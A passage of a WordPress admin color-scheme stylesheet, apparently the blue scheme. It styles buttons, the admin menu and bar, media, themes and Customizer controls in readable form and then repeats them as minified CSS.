var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ } .wp-core-ui .button { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button:disabled, .wp-core-ui .button.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Secondary button - same as default */ } .wp-core-ui .button-secondary { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button-secondary:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-secondary:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-secondary:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Primary button - theme color background */ } .wp-core-ui .button-primary { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: 2px; color: #fff; } .wp-core-ui .button-primary:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: #fff; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px #ffffff; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } .wp-core-ui .button-primary:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary.disabled { background: #f0f0f0; border-color: transparent; color: #949494; cursor: not-allowed; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: var(--wp-admin-theme-color-darker-10); color: #fff; border-color: transparent; box-shadow: none; } .wp-core-ui .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-core-ui .wp-ui-primary { color: #fff; background-color: #52accc; } .wp-core-ui .wp-ui-text-primary { color: #52accc; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #096484; } .wp-core-ui .wp-ui-text-highlight { color: #096484; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #e1a948; } .wp-core-ui .wp-ui-text-notification { color: #e1a948; } .wp-core-ui .wp-ui-text-icon { color: #e5f8ff; } /* List tables */ .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: #52accc; } .view-switch a:hover:before { color: #e1a948; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #52accc; } #adminmenu a { color: #fff; } #adminmenu div.wp-menu-image:before { color: #e5f8ff; } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #096484; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #fff; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f0f0f0; border-bottom-color: #f0f0f0; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: #4796b3; } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-right-color: #4796b3; } #adminmenu .wp-submenu .wp-submenu-head { color: #e2ecf1; } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: #e2ecf1; } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: #fff; } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #fff; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: #fff; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-right-color: #f0f0f0; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #096484; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #fff; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #e1a948; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #fff; background: #4796b3; } /* Admin Menu: collapse button */ #collapse-button { color: #e5f8ff; } #collapse-button:hover, #collapse-button:focus { color: #fff; } /* Admin Bar */ #wpadminbar { color: #fff; background: #52accc; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #fff; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: #e5f8ff; } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: #fff; background: #4796b3; } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #fff; } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: #fff; } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: #4796b3; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(116.162375, 182.0949364754, 205.537625); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: #e2ecf1; } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: #e5f8ff; } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #fff; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #fff; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #e5f8ff; } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: #e5f8ff; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #fff; background: rgb(109.571875, 185.228125, 212.128125); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #e1a948; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(202.5, 152.1, 64.8); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(109.571875, 185.228125, 212.128125); background-color: rgb(109.571875, 185.228125, 212.128125); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info .username { color: #e2ecf1; } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #096484; border-color: rgb(7.3723404255, 81.914893617, 108.1276595745); } .wp-pointer .wp-pointer-content h3:before { color: #096484; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #096484; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #096484; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #096484; } .attachment.details .check { background-color: #096484; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #096484; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #096484; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #096484; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #096484; } .theme-section.current, .theme-filter.current { border-bottom-color: #52accc; } body.more-filters-opened .more-filters { color: #fff; background-color: #52accc; } body.more-filters-opened .more-filters:before { color: #fff; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #096484; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #096484; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(232.1830985915, 189.5915492958, 115.8169014085), 0 0 2px 1px #e1a948; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: #e5f8ff; } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #096484; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: #4796b3; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #e5f8ff; } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #096484; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-left-color: #e1a948; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #e1a948; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-left-color: #e1a948; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(232.1830985915, 189.5915492958, 115.8169014085), 0 0 2px 1px #e1a948; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-left-color: #e1a948; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #e1a948; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #e1a948; border-style: solid; box-shadow: 0 0 0 1px #e1a948; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #e1a948; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #e1a948; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #e1a948; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(232.1830985915, 189.5915492958, 115.8169014085), 0 0 2px 1px #e1a948; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #e1a948; color: #0073aa; }/*! This file is auto-generated */ body{background:#f0f0f0}a{color:#0073aa}a:active,a:focus,a:hover{color:rgb(0,149.5,221)}#post-body #visibility:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-revisions:before,.curtime #timestamp:before,span.wp-media-buttons-icon:before{color:currentColor}.wp-core-ui .button-link,.wp-core-ui .button.button-link{color:var(--wp-admin-theme-color)}.wp-core-ui .button-link:active,.wp-core-ui .button-link:hover,.wp-core-ui .button.button-link:active,.wp-core-ui .button.button-link:hover{color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-link:focus,.wp-core-ui .button.button-link:focus{color:var(--wp-admin-theme-color);border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-link:disabled,.wp-core-ui .button-link[aria-disabled=true],.wp-core-ui .button.button-link:disabled,.wp-core-ui .button.button-link[aria-disabled=true]{color:#949494}.media-modal .delete-attachment,.media-modal .trash-attachment,.media-modal .untrash-attachment,.wp-core-ui .button-link-delete{color:#cc1818}.media-modal .delete-attachment:focus,.media-modal .delete-attachment:hover,.media-modal .trash-attachment:focus,.media-modal .trash-attachment:hover,.media-modal .untrash-attachment:focus,.media-modal .untrash-attachment:hover,.wp-core-ui .button-link-delete:focus,.wp-core-ui .button-link-delete:hover{color:rgb(230.6842105263,48.3157894737,48.3157894737)}input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:rgb(0,149.5,221)}input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}input[type=checkbox]:focus,input[type=radio]:focus{border-color:#1e1e1e;box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid transparent}.wp-core-ui select:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-tags-autocomplete .ui-state-focus,.wp-tags-autocomplete [aria-selected=true]{background-color:var(--wp-admin-theme-color)}#pass1-text:focus,#pass1:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.mailserver-pass-wrap .button.wp-hide-pw:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-core-ui .button{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button.disabled,.wp-core-ui .button:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-secondary{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button-secondary:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-secondary:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-secondary:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button-secondary.disabled,.wp-core-ui .button-secondary:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary{background:var(--wp-admin-theme-color);border-color:transparent;border-radius:2px;color:#fff}.wp-core-ui .button-primary:hover{background:var(--wp-admin-theme-color-darker-10);border-color:transparent;color:#fff}.wp-core-ui .button-primary:focus{background:var(--wp-admin-theme-color);border-color:transparent;color:#fff;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid transparent}.wp-core-ui .button-primary:active{background:var(--wp-admin-theme-color-darker-20);border-color:transparent;color:#fff}.wp-core-ui .button-primary.disabled,.wp-core-ui .button-primary:disabled{background:#f0f0f0;border-color:transparent;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary.active,.wp-core-ui .button-primary.active:focus,.wp-core-ui .button-primary.active:hover{background:var(--wp-admin-theme-color-darker-10);color:#fff;border-color:transparent;box-shadow:none}.wp-core-ui .button-group>.button.active{border-color:var(--wp-admin-theme-color);background:rgba(var(--wp-admin-theme-color--rgb),.08)}.wp-core-ui .wp-ui-primary{color:#fff;background-color:#52accc}.wp-core-ui .wp-ui-text-primary{color:#52accc}.wp-core-ui .wp-ui-highlight{color:#fff;background-color:#096484}.wp-core-ui .wp-ui-text-highlight{color:#096484}.wp-core-ui .wp-ui-notification{color:#fff;background-color:#e1a948}.wp-core-ui .wp-ui-text-notification{color:#e1a948}.wp-core-ui .wp-ui-text-icon{color:#e5f8ff}.wrap .page-title-action{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wrap .page-title-action:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wrap .page-title-action:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wrap .page-title-action:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.view-switch a.current:before{color:#52accc}.view-switch a:hover:before{color:#e1a948}#adminmenu,#adminmenuback,#adminmenuwrap{background:#52accc}#adminmenu a{color:#fff}#adminmenu div.wp-menu-image:before{color:#e5f8ff}#adminmenu a:hover,#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{color:#fff;background-color:#096484}#adminmenu li.menu-top:hover div.wp-menu-image:before,#adminmenu li.opensub>a.menu-top div.wp-menu-image:before{color:#fff}.about-wrap .nav-tab-active,.nav-tab-active,.nav-tab-active:hover{background-color:#f0f0f0;border-bottom-color:#f0f0f0}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,#adminmenu .wp-submenu,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{background:#4796b3}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-right-color:#4796b3}#adminmenu .wp-submenu .wp-submenu-head{color:#e2ecf1}#adminmenu .wp-has-current-submenu .wp-submenu a,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a,#adminmenu .wp-submenu a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a{color:#e2ecf1}#adminmenu .wp-has-current-submenu .wp-submenu a:focus,#adminmenu .wp-has-current-submenu .wp-submenu a:hover,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover,#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:hover{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:hover{color:#fff}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{border-right-color:#f0f0f0}#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu,.folded #adminmenu li.current.menu-top{color:#fff;background:#096484}#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.current div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#fff}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu .update-plugins{color:#fff;background:#e1a948}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod,#adminmenu li.menu-top:hover>a .update-plugins,#adminmenu li:hover a .awaiting-mod{color:#fff;background:#4796b3}#collapse-button{color:#e5f8ff}#collapse-button:focus,#collapse-button:hover{color:#fff}#wpadminbar{color:#fff;background:#52accc}#wpadminbar .ab-item,#wpadminbar a.ab-item,#wpadminbar>#wp-toolbar span.ab-label,#wpadminbar>#wp-toolbar span.noticon{color:#fff}#wpadminbar .ab-icon,#wpadminbar .ab-icon:before,#wpadminbar .ab-item:after,#wpadminbar .ab-item:before{color:#e5f8ff}#wpadminbar .ab-top-menu>li.menupop.hover>.ab-item,#wpadminbar.nojq .quicklinks 